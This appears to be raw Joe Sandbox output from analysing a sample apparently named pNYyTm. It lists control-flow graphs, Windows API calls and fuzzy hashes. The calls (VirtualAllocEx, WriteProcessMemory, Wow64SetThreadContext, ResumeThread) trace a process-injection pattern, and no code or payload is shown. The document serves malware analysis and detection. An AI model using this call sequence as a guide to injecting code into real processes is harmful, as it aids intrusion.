                    control_flow_graph 115 19cb068-19cb077 116 19cb079-19cb086 call 19cad20 115->116 117 19cb0a3-19cb0a7 115->117 124 19cb09c 116->124 125 19cb088 116->125 119 19cb0a9-19cb0b3 117->119 120 19cb0bb-19cb0fc 117->120 119->120 126 19cb0fe-19cb106 120->126 127 19cb109-19cb117 120->127 124->117 170 19cb08e call 19cb300 125->170 171 19cb08e call 19cb2f0 125->171 126->127 128 19cb119-19cb11e 127->128 129 19cb13b-19cb13d 127->129 131 19cb129 128->131 132 19cb120-19cb127 call 19cad2c 128->132 134 19cb140-19cb147 129->134 130 19cb094-19cb096 130->124 133 19cb1d8-19cb298 130->133 136 19cb12b-19cb139 131->136 132->136 165 19cb29a-19cb29d 133->165 166 19cb2a0-19cb2cb GetModuleHandleW 133->166 137 19cb149-19cb151 134->137 138 19cb154-19cb15b 134->138 136->134 137->138 139 19cb15d-19cb165 138->139 140 19cb168-19cb171 call 19cad3c 138->140 139->140 146 19cb17e-19cb183 140->146 147 19cb173-19cb17b 140->147 148 19cb185-19cb18c 146->148 149 19cb1a1-19cb1ae 146->149 147->146 148->149 151 19cb18e-19cb19e call 19cad4c call 19cad5c 148->151 155 19cb1b0-19cb1ce 149->155 156 19cb1d1-19cb1d7 149->156 151->149 155->156 165->166 167 19cb2cd-19cb2d3 166->167 168 19cb2d4-19cb2e8 166->168 167->168 170->130 171->130
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 019CB2BE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 1b5a92116b1b78907e4ff340ef599189e7f708e7488152256c340f6ddd59a58d
                    • Instruction ID: 8c025901ffbc178feca4b1833e377dfa9286d0c52c0f243018b2efe8a5aa2410
                    • Opcode Fuzzy Hash: 1b5a92116b1b78907e4ff340ef599189e7f708e7488152256c340f6ddd59a58d
                    • Instruction Fuzzy Hash: 4C716570A00B058FEB24CF69D44575ABBF5FF88640F008A2DD48AD7A40E774E945CF92

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 172 19c44c4-19c59d9 CreateActCtxA 175 19c59db-19c59e1 172->175 176 19c59e2-19c5a3c 172->176 175->176 183 19c5a3e-19c5a41 176->183 184 19c5a4b-19c5a4f 176->184 183->184 185 19c5a60 184->185 186 19c5a51-19c5a5d 184->186 187 19c5a61 185->187 186->185 187->187
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 019C59C9
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: d117a2b09e93f59899ad878a100eabbcc49bc05d6b687ef0c28f8820dd484faf
                    • Instruction ID: 457d1f495edc30a063fefdb12bd86d3d823b0c31137864f8c80b9253e3bcdf74
                    • Opcode Fuzzy Hash: d117a2b09e93f59899ad878a100eabbcc49bc05d6b687ef0c28f8820dd484faf
                    • Instruction Fuzzy Hash: 3341F170D0071DCBEB24DFAAC884BDDBBB5BF49704F60845AD408AB251DBB16945CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 19c590c-19c5912 190 19c5918-19c59d9 CreateActCtxA 189->190 192 19c59db-19c59e1 190->192 193 19c59e2-19c5a3c 190->193 192->193 200 19c5a3e-19c5a41 193->200 201 19c5a4b-19c5a4f 193->201 200->201 202 19c5a60 201->202 203 19c5a51-19c5a5d 201->203 204 19c5a61 202->204 203->202 204->204
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 019C59C9
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: c5f926e0a6e61a11432356b954a5ec61a7657d77ad29f2f5ded8de4309221b15
                    • Instruction ID: 4a7056a197fffa4ef29f6f48168084a64bbadf6af1fcc7ef53118e23596af092
                    • Opcode Fuzzy Hash: c5f926e0a6e61a11432356b954a5ec61a7657d77ad29f2f5ded8de4309221b15
                    • Instruction Fuzzy Hash: F041F170D0071DCBEB24DFAAC884BDDBBB5BF49704F20805AD808AB251DBB56985CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 206 6443ab0-6443b06 209 6443b16-6443b55 WriteProcessMemory 206->209 210 6443b08-6443b14 206->210 212 6443b57-6443b5d 209->212 213 6443b5e-6443b8e 209->213 210->209 212->213
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06443B48
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: ae90f6aebf6ed97c2eb79d5d3a465f92ad58b401f2bb1cbcd33d7ef8c325c22a
                    • Instruction ID: 9a1f60ffa8f2763c3310a167d583e068f61ffb1ed4f6311226cd23e1dd42ab4b
                    • Opcode Fuzzy Hash: ae90f6aebf6ed97c2eb79d5d3a465f92ad58b401f2bb1cbcd33d7ef8c325c22a
                    • Instruction Fuzzy Hash: 482125B19003499FDB10DFAAC881BDEBBF5FF48310F10842AE959A7241D779A955CBA0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 217 6443ab8-6443b06 219 6443b16-6443b55 WriteProcessMemory 217->219 220 6443b08-6443b14 217->220 222 6443b57-6443b5d 219->222 223 6443b5e-6443b8e 219->223 220->219 222->223
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06443B48
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 6819d11f21c6b9466ecf7a2eca2f6aa38c71a9080f7be206a2fd09ebeb7cb901
                    • Instruction ID: f1e27f1fb4e2ff8305b320d1b542c7cecef263382f2ab27ffd8ed53304faca1a
                    • Opcode Fuzzy Hash: 6819d11f21c6b9466ecf7a2eca2f6aa38c71a9080f7be206a2fd09ebeb7cb901
                    • Instruction Fuzzy Hash: 3A212671D003499FDB10DFAAC881BDEBBF5FF48310F10842AE919A7241C7789955CBA4

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 238 6443ba0-6443c35 ReadProcessMemory 242 6443c37-6443c3d 238->242 243 6443c3e-6443c6e 238->243 242->243
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06443C28
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: ef5091cea62e244927e32828a059c8244657bb8f8c337664220da5a864085a30
                    • Instruction ID: cfd0428bac288298c6bf4e72e9daa25bad87af95d63c03bf1df783de9bd4a9f1
                    • Opcode Fuzzy Hash: ef5091cea62e244927e32828a059c8244657bb8f8c337664220da5a864085a30
                    • Instruction Fuzzy Hash: 7F211972C003599FDB10DFAAC8416DEFBF5FF48210F10882AD514A7250D7759945CB60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 227 6443919-644396b 230 644396d-6443979 227->230 231 644397b-64439ab Wow64SetThreadContext 227->231 230->231 233 64439b4-64439e4 231->233 234 64439ad-64439b3 231->234 234->233
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0644399E
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 74b9bfba0aba5a52bbd5e8e103c9c5821bfa6a267e42b425e074713d972d0ece
                    • Instruction ID: 34822ffad91a052776142aea7c008dd5014c5e18a54aa63337c4fe63411ff29e
                    • Opcode Fuzzy Hash: 74b9bfba0aba5a52bbd5e8e103c9c5821bfa6a267e42b425e074713d972d0ece
                    • Instruction Fuzzy Hash: 20215971D003099FDB24DFAAC4857EEBBF5EF48214F14842AD859A7240CB78A945CFA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 247 19caf54-19cd5dc DuplicateHandle 249 19cd5de-19cd5e4 247->249 250 19cd5e5-19cd602 247->250 249->250
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019CD50E,?,?,?,?,?), ref: 019CD5CF
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 5d89b09dd541fc0ba95ae2f2fb12aa7e87693c546a07564823815acff706bc91
                    • Instruction ID: 3c964a2b90254668510b569f31c0015075917e46c17fc21777b2c6b06985447c
                    • Opcode Fuzzy Hash: 5d89b09dd541fc0ba95ae2f2fb12aa7e87693c546a07564823815acff706bc91
                    • Instruction Fuzzy Hash: 9021E4B5900348AFDB10CF9AD584AEEFBF9EB48314F14842AE958A7310D374A954CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 253 19cd540-19cd542 254 19cd548-19cd5dc DuplicateHandle 253->254 255 19cd5de-19cd5e4 254->255 256 19cd5e5-19cd602 254->256 255->256
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019CD50E,?,?,?,?,?), ref: 019CD5CF
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 12a2dbb16ab91307f3f83c9e6679d029cb58f6b53533472ba2bacbb5557ccab8
                    • Instruction ID: 2cae4d16b5d31c67605ccd2197d66b799e617e04f8cdffcc1c97adfaffa7ee97
                    • Opcode Fuzzy Hash: 12a2dbb16ab91307f3f83c9e6679d029cb58f6b53533472ba2bacbb5557ccab8
                    • Instruction Fuzzy Hash: F42103B5900348AFDB10CFAAD584BDEFFF8EB48310F14841AE958A7210D374AA50CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 269 6443ba8-6443c35 ReadProcessMemory 272 6443c37-6443c3d 269->272 273 6443c3e-6443c6e 269->273 272->273
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06443C28
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: 88aacf546369d258c18af6752aef9c467c50f0fc7819128699d1b1626fcf7293
                    • Instruction ID: 166e46aaa2150eedc66525dcca9a3d1dc891a09e898505905973ec395fea2396
                    • Opcode Fuzzy Hash: 88aacf546369d258c18af6752aef9c467c50f0fc7819128699d1b1626fcf7293
                    • Instruction Fuzzy Hash: 9D210772C003599FDB10DFAAC841BDEBBF5FF48310F10842AE519A7250C7789951CB60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 259 6443920-644396b 261 644396d-6443979 259->261 262 644397b-64439ab Wow64SetThreadContext 259->262 261->262 264 64439b4-64439e4 262->264 265 64439ad-64439b3 262->265 265->264
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0644399E
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 14d530ce90bbf5a94c96d135dc902de31547e6c4392cea3038fc20c3b2f9be07
                    • Instruction ID: a96b02e3872a824b77ef92d08558560dd383fcc6e1d6ad014d08be34ead21d08
                    • Opcode Fuzzy Hash: 14d530ce90bbf5a94c96d135dc902de31547e6c4392cea3038fc20c3b2f9be07
                    • Instruction Fuzzy Hash: 36213871D003098FDB10DFAAC4857EEBBF5EF88214F14842AD459A7240CB789945CFA0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 277 64439f1-6443a73 VirtualAllocEx 281 6443a75-6443a7b 277->281 282 6443a7c-6443aa1 277->282 281->282
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06443A66
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 1b6cee5b098595ad9e123f7046f04465ac59e1ca57bd57bc071d98ae24c8a7b6
                    • Instruction ID: b7732f6b003cd6a1dc15e67713d5f5bf36bd3b4e739ffe7eb4480eb6c88d6443
                    • Opcode Fuzzy Hash: 1b6cee5b098595ad9e123f7046f04465ac59e1ca57bd57bc071d98ae24c8a7b6
                    • Instruction Fuzzy Hash: 2B1136769003099FDF20DFAAC845BDEBBF5EF48310F248419E955A7250C775A954CBA0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 286 19cad88-19cb520 288 19cb528-19cb557 LoadLibraryExW 286->288 289 19cb522-19cb525 286->289 290 19cb559-19cb55f 288->290 291 19cb560-19cb57d 288->291 289->288 290->291
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019CB339,00000800,00000000,00000000), ref: 019CB54A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: f720b52d4e2d3c76d5843d9c613e9cf58c3c53a1953028a31666eb7895c6aafb
                    • Instruction ID: f47f8b925aefb539b4737b9da94ccfe1973dd846904414c4023dda85c1b96926
                    • Opcode Fuzzy Hash: f720b52d4e2d3c76d5843d9c613e9cf58c3c53a1953028a31666eb7895c6aafb
                    • Instruction Fuzzy Hash: CD1144B69003488FDB20CF9AD445BEEFBF8EB48750F10842ED959A7200C374A945CFA5
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019CB339,00000800,00000000,00000000), ref: 019CB54A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 9cda642aa5c7d155732801faac6f6153bf679e43450727a803f97b2c8ca3e45c
                    • Instruction ID: c5324483c1c1941acef79b6c867406911b2701ae65c90efa69675b3148ff87f8
                    • Opcode Fuzzy Hash: 9cda642aa5c7d155732801faac6f6153bf679e43450727a803f97b2c8ca3e45c
                    • Instruction Fuzzy Hash: 3D1112B69003499FDB14CF9AD844BDEFBF8EB88710F14842ED969A7200C375A945CFA5
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 29cf20d96df0a9715198fe09a0aaf7d70c68afb7494e0adc750f75ce5f86df7d
                    • Instruction ID: 0808e5d3a7eee863723f56204a38956d10fa3eefc5b5567546d2630a7ac5a422
                    • Opcode Fuzzy Hash: 29cf20d96df0a9715198fe09a0aaf7d70c68afb7494e0adc750f75ce5f86df7d
                    • Instruction Fuzzy Hash: D9114971D003488FDB20DFAAC4457DEFBF5EF49310F24881AD415A7244C775A945CBA0
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06443A66
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 4f4cd816e99ce9bc9e755021cdc67b7d86910a39f89072e650d53e843cf3d4b5
                    • Instruction ID: 4b7b7e84b230c48ff620fcc6e2ac8cd6040dc63ec642a5e0b9e897edcdebd7a2
                    • Opcode Fuzzy Hash: 4f4cd816e99ce9bc9e755021cdc67b7d86910a39f89072e650d53e843cf3d4b5
                    • Instruction Fuzzy Hash: F71126729003499FDF20DFAAC845BEEBBF5EF48320F24841AE515A7250C775A950CBA0
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 15c3b04f93247fc5d89f35295dfa7732cdfeb9470201b93173ae99a5af9c66d6
                    • Instruction ID: a1ee6bfe5dd99152cf4e616a14d855ec184c3e75f655992d2fa1c4417901e990
                    • Opcode Fuzzy Hash: 15c3b04f93247fc5d89f35295dfa7732cdfeb9470201b93173ae99a5af9c66d6
                    • Instruction Fuzzy Hash: 4B1166B1D003488FDB20DFAAC4457EEFBF5EF88220F24841AC419A7244CB79A944CBA0
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06447205
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: MessagePost
                    • String ID:
                    • API String ID: 410705778-0
                    • Opcode ID: d58cc5afdee6e924c3eaffca8a3eb29d47bcab18d750e3823bec1d8dfe605afa
                    • Instruction ID: 63960320caf6d3983c409b6f2fb0569dcde8d18943509518581ab13fe556b940
                    • Opcode Fuzzy Hash: d58cc5afdee6e924c3eaffca8a3eb29d47bcab18d750e3823bec1d8dfe605afa
                    • Instruction Fuzzy Hash: 6B11F5B68003499FDB20DF9AC485BDEFBF8FB48314F20881AE558A7210C375A545CFA5
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 019CB2BE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1367898163.00000000019C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_19c0000_pNYyTm.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 0cfa7938e1118b09b6a5824bebaa8ece763c4322d0c6c1a09df2970e31f64ecd
                    • Instruction ID: 17b4c78a3b3d8f501361b4f1d00d3654b0300d9973023dfedf8a01925f3b5878
                    • Opcode Fuzzy Hash: 0cfa7938e1118b09b6a5824bebaa8ece763c4322d0c6c1a09df2970e31f64ecd
                    • Instruction Fuzzy Hash: 02110FB6C003498FDB20CF9AC444BDEFBF9AB88314F10842AD869A7210C375A545CFA1
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06447205
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: MessagePost
                    • String ID:
                    • API String ID: 410705778-0
                    • Opcode ID: c81fbd72a3fce9ee2d672cecbb872b92456590565c886e6a43b5b8866781d7b2
                    • Instruction ID: 6e46b848c3014ece6b42b113dc27b5bad6e521dccabb275eeb63005e6f9acbb9
                    • Opcode Fuzzy Hash: c81fbd72a3fce9ee2d672cecbb872b92456590565c886e6a43b5b8866781d7b2
                    • Instruction Fuzzy Hash: 6C11E3B58003499FDB10DF9AC445BDEBBF8FB48314F10841AE915A7300C375A944CFA1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8
                    • API String ID: 0-4194326291
                    • Opcode ID: 5e86d0208ccc74f4deeaa4ce0c6a192a91916a42dc46121bd778f9b723953909
                    • Instruction ID: 5492dee09044a76b681ed33e1a0c7e341d2548eed79075541e024f65062a0573
                    • Opcode Fuzzy Hash: 5e86d0208ccc74f4deeaa4ce0c6a192a91916a42dc46121bd778f9b723953909
                    • Instruction Fuzzy Hash: 5E212970B103458FDB12EB38C45459FBBF6AF81210B0588AAE546DB355DF70EC05CB92
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 555d2bd4dc5af8f67bc455a0eb971cff391d09e8ca18bfe5da1ef5dbc217b46c
                    • Instruction ID: c9e183be9c86fe1e54065d64a1dab4072ccffd31e74e1e21592b7c52dc4de6d1
                    • Opcode Fuzzy Hash: 555d2bd4dc5af8f67bc455a0eb971cff391d09e8ca18bfe5da1ef5dbc217b46c
                    • Instruction Fuzzy Hash: BE51E431B102068FDB11EB79D84896FBBF6FFC8220715896AE469D7391EF309D058751
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 73c5446d5194fc27e79b63f15965db52d4c65fb30d4f1ad669c89f2b00edbd40
                    • Instruction ID: ddbc57ea0c330afb0fb3f4f25f8c16a2ab7a0d7f9762b339d24fb15b771f67d9
                    • Opcode Fuzzy Hash: 73c5446d5194fc27e79b63f15965db52d4c65fb30d4f1ad669c89f2b00edbd40
                    • Instruction Fuzzy Hash: FA513E75D19619DFDB82CFA8D4858FDBBB4BB4E280F025456EC16A7302E7309816CBA4
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e48f274db325d782fcde2c05fe7cc02d82cfc6e3297fee10ca02da2696cc2013
                    • Instruction ID: 0e175c094cd420ac85a7b14e6f87009fb4e8445f5bfeeb66d93182f9a34f8e56
                    • Opcode Fuzzy Hash: e48f274db325d782fcde2c05fe7cc02d82cfc6e3297fee10ca02da2696cc2013
                    • Instruction Fuzzy Hash: 7A511F75D15619DFDB82CFA9D4848FDBBB4FB4D280F025456EC16A7302E7309816CBA4
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 020a8380a57ff2861354b756ea948a31635577c37cf1df6ce0903e42eb7a8f15
                    • Instruction ID: e483a718e1c8a1ecb55f035895cc3ad23628d9be88e78a90154c8dc7a42159ff
                    • Opcode Fuzzy Hash: 020a8380a57ff2861354b756ea948a31635577c37cf1df6ce0903e42eb7a8f15
                    • Instruction Fuzzy Hash: 9A41AD71A143499FCB11DFAAD844ADEBFF5EF8A310F15842BE854E7211C734A945CBA0
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d7b6364d588587b9510e2656499bc9c876acb12eae84f682f17a2989ed8360a
                    • Instruction ID: a48d449e9a52d7f75f7fe0264cbc2136b635381bec6dc3321c10b5be8b61559e
                    • Opcode Fuzzy Hash: 3d7b6364d588587b9510e2656499bc9c876acb12eae84f682f17a2989ed8360a
                    • Instruction Fuzzy Hash: CC41E474D09318DFDF54DFA5D884AEDBBF5FB4A311F156016E80AAB252C7349982CB40
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6020a73b6682adc40c5e9f137a468f03d80261b632c83443cca0762c052be35b
                    • Instruction ID: 73868559e5d3a89e7a6c58b9872066bf4275167502675565f979c2063f2addbb
                    • Opcode Fuzzy Hash: 6020a73b6682adc40c5e9f137a468f03d80261b632c83443cca0762c052be35b
                    • Instruction Fuzzy Hash: 2141B470E08615CFDB85CF56D4849BEBBF8BF8E340B42A496D8199B217EB30D812CB40
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d105a19771aaa7b42c776ecbe59b1c4c137becdf6813fcf7382e4ad73f8493e1
                    • Instruction ID: 67656db1f89a8ec48426a6380dfeb50a7aec06ad76abb21c618455ce6a0a58b3
                    • Opcode Fuzzy Hash: d105a19771aaa7b42c776ecbe59b1c4c137becdf6813fcf7382e4ad73f8493e1
                    • Instruction Fuzzy Hash: 88417370E08615CFEB85DF96D4849BEBBF8FF8D340B42A496D4199B217EB709812CB40
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376623390.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6450000_pNYyTm.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e81c7a360773bc2fed27daf5307e55be90aca7bfb3cb2e6fdf3ea9e3acb9622
                    • Instruction ID: e4f73c0c889f37d45e482cb02d3b8fcc95bb940bf27ae21f83adb413850acaa3
                    • Opcode Fuzzy Hash: 5e81c7a360773bc2fed27daf5307e55be90aca7bfb3cb2e6fdf3ea9e3acb9622
